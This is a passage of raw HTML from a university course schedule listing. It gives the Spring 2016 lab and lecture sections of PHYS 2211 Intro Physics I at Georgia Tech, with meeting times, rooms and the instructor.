<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20994">Intro Physics I - 20994 - PHYS 2211 - K03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=27654">Intro Physics I - 27654 - PHYS 2211 - K04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20995">Intro Physics I - 20995 - PHYS 2211 - K05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20996">Intro Physics I - 20996 - PHYS 2211 - K06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20997">Intro Physics I - 20997 - PHYS 2211 - K07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22491">Intro Physics I - 22491 - PHYS 2211 - M</a></th>
</tr>
<tr>
<td class="dddefault">
PHYS2211M
introduces both modern topics (e.g. relativity & quantum
physics) and modern tools such as computer modeling.
Prerequisites are the same as the standard 2211 offering.
This course uses a different textbook than the standard 2211
sections, called Matter & Interactions. No previous
computer programming experience is required.
No lab exemptions are offered.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">10:05 am - 10:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 144</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21022">Intro Physics I - 21022 - PHYS 2211 - M01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22495">Intro Physics I - 22495 - PHYS 2211 - M02</a></th>
</tr>
<tr>
<td class="dddefault">
This lab section is reserved for Honors Program students
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22496">Intro Physics I - 22496 - PHYS 2211 - M03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22497">Intro Physics I - 22497 - PHYS 2211 - M04</a></th>
</tr>
<tr>
<td class="dddefault">
This lab section is reserved for Honors Program students
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22498">Intro Physics I - 22498 - PHYS 2211 - M05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22499">Intro Physics I - 22499 - PHYS 2211 - M06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=30977">Intro Physics I - 30977 - PHYS 2211 - M07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=30978">Intro Physics I - 30978 - PHYS 2211 - M08</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
